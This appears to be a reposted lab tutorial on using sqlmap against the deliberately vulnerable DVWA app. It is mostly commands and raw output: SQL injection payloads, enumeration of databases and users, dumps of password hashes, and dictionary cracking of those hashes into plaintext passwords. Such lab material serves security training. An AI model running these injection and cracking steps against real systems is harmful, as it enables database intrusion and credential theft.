sql injection – sqlmap
来源:互联网 发布:查看域名是否备案 编辑:程序博客网 时间:2024/05/29 14:26
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
backtrack 5r1
/pentest/database/sqlmap
To find SQL database version
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url
To Find SQL database Nameroot@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dbs
To find database table namesroot@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --tables -D database-name
To find database columnsroot@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --column -T table-name -D database-name
To see the data from databaseroot@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dump --column -T table-name -D database-name
grab cookie from tamperdata firefox plugin
root@bt:/pentest/database/sqlmap#./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --dbs
sqlmap/1.0-dev (r4009) – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 17:05:51
[17:05:52] [INFO] using ‘/pentest/database/sqlmap/output/IP-Address/session’ as session file
[17:05:52] [INFO] resuming injection data from session file
[17:05:52] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[17:05:52] [INFO] testing connection to the target url
[17:05:52] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
—
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1′ AND 8761=8761 AND ‘FczA’=’FczA&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1′ AND (SELECT 45 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,118,105,58),(SELECT (CASE WHEN (45=45) THEN 1 ELSE 0 END)),CHAR(58,113,98,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘COXA’=’COXA&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=1′ UNION ALL SELECT NULL, CONCAT(CHAR(58,106,118,105,58),IFNULL(CAST(CHAR(117,73,80,113,73,74,111,75,85,72) AS CHAR),CHAR(32)),CHAR(58,113,98,100,58))# AND ‘kmcR’=’kmcR&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1′ AND SLEEP(5) AND ‘qxrK’=’qxrK&Submit=Submit
—
[17:05:52] [INFO] manual usage of GET payloads requires url encoding
[17:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[17:05:52] [INFO] fetching database names
[17:05:52] [INFO] read from file ‘/pentest/database/sqlmap/output/IP-Address/session’: information_schema, cdcol, mysql, performance_schema, phpmyadmin, test, webauth
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
[17:05:52] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/IP-Address’
./sqlmap.py -u ‘http://IP-Address/?id=1&Submit=Submit#’ –cookie=’PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low’ –string=”Surname” –users –password
dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit' --dbs --users --passwords
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:07:20
[11:07:20] [INFO] using '/home/dojo/tools/sqlmap/output/127.0.0.1/session' as session file
[11:07:20] [INFO] resuming string match 'Surname' from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[11:07:21] [INFO] resuming injection point 'GET' from session file
[11:07:21] [INFO] resuming injection parameter 'id' from session file
[11:07:21] [INFO] resuming injection type 'stringsingle' from session file
[11:07:21] [INFO] resuming 0 number of parenthesis from session file
[11:07:21] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:07:21] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php - What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application
>
[11:07:22] [INFO] testing for parenthesis on injectable parameter
[11:07:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[11:07:22] [INFO] fetching database users
[11:07:22] [INFO] fetching number of database users
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'localhost'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'dojo-vm'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'127.0.0.1'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'
[11:07:22] [INFO] fetching database users password hashes
[11:07:22] [INFO] fetching number of password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching database names
[11:07:22] [INFO] fetching number of databases
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': information_schema
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': dvwa
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': mysql
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test
[11:07:22] [INFO] Fetched data logged to text files under '/home/dojo/tools/sqlmap/output/127.0.0.1'
[*] shutting down at: 11:07:22
dojo@dojo-vm:~/tools/sqlmap$
————————————————————–
updates
————————————————————–
Find database
Used tamperdata firefox plugin to get Cookie as bellow
Cookie=security=low; _session_id=f4cd3cc878720ceedcc985be580901d4; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3
reload the login page so get clean url /dvwa/vulnerabilities/sqli/?id=&Submit=Submit#
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" --dbs --users --passwords
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 10:14:04
[10:14:04] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:14:04] [INFO] resuming injection data from session file
[10:14:04] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:14:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---
[10:14:04] [INFO] manual usage of GET payloads requires url encoding
[10:14:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:14:04] [INFO] fetching database users
[10:14:04] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'
[10:14:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[10:14:10] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:14:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[10:14:22] [INFO] starting dictionary attack (mysql_passwd)
[10:14:24] [WARNING] no clear password(s) found
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[*] root [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[10:14:24] [INFO] fetching database names
[10:14:24] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test
[10:14:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'
[*] shutting down at: 10:14:24
————————————————————–
Find tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 10:27:40
[10:27:40] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:27:40] [INFO] resuming injection data from session file
[10:27:40] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:27:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---
[10:27:40] [INFO] manual usage of GET payloads requires url encoding
[10:27:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:27:40] [INFO] fetching tables for database: dvwa
[10:27:40] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[10:27:40] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'
[*] shutting down at: 10:27:40
--------------------------------------------------------------
Find users
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --users
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 10:28:45
[10:28:45] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:28:45] [INFO] resuming injection data from session file
[10:28:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:28:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---
[10:28:45] [INFO] manual usage of GET payloads requires url encoding
[10:28:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:28:45] [INFO] fetching database users
[10:28:45] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'
[10:28:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'
[*] shutting down at: 10:28:45
--------------------------------------------------------------
Find passwords
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa -T users -C password --dump
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 10:24:19
[10:24:20] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:24:20] [INFO] resuming injection data from session file
[10:24:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:24:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---
[10:24:20] [INFO] manual usage of GET payloads requires url encoding
[10:24:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[10:24:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[10:24:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[10:24:24] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:24:26] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:24:28] [INFO] starting dictionary attack (md5_generic_passwd)
[10:24:28] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[10:24:29] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:24:29] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:24:30] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+
[10:24:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/10.255.245.136/dump/dvwa/users.csv'
[10:24:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'
[*] shutting down at: 10:24:30
http://www.myexploit.wordpress.com/web-application-webscarab/
————————————————————–
/pentest/web/webscarab
root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar
root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations
root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$
[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
Note you can use online decrypter sites
MySQL4.1 uses sha1
http://www.md5decrypter.co.uk/sha1-decrypt.aspx
263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo
[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test
[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+---------------------------------------+
| customers |
| users |
+---------------------------------------+
Database: dvwa
[2 tables]
+---------------------------------------+
| guestbook |
| users |
+---------------------------------------+
[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
- sql injection – sqlmap
- Sqlmap tutorial for beginners – hacking with sql injection
- sqlmap dvwa SQL Injection使用小记
- From SQL Injection To 0wnage Using SQLMap
- SQL Injection
- SQL injection
- sql injection
- SQL Injection
- sql injection
- sql Injection
- sql injection
- sql injection
- SQL injection
- SQL injection
- SQL Injection
- SQL Injection
- SQL Injection
- SQL injection
- RHEL 7 & CentOS 7禁用IPV6
- Chrome的多线程模型
- 实习记——(六)关于数据分页
- 《深入理解mybatis原理》 MyBatis缓存机制的设计与实现
- thinking in java 笔记 思维导图 第五章初始化与清理
- sql injection – sqlmap
- 关于java中的hashCode方法
- 用Myeclipse开发Java web时相对路径问题
- JQuery实现DIV拖动效果示例
- ubuntu下安装adobe player的方法
- thinking in java 笔记 思维导图 第六章 访问权限控制
- 灰度 灰度图像
- 使用String日期和时间的格式化
- 黑马程序员——多线程4:再谈单例设计模式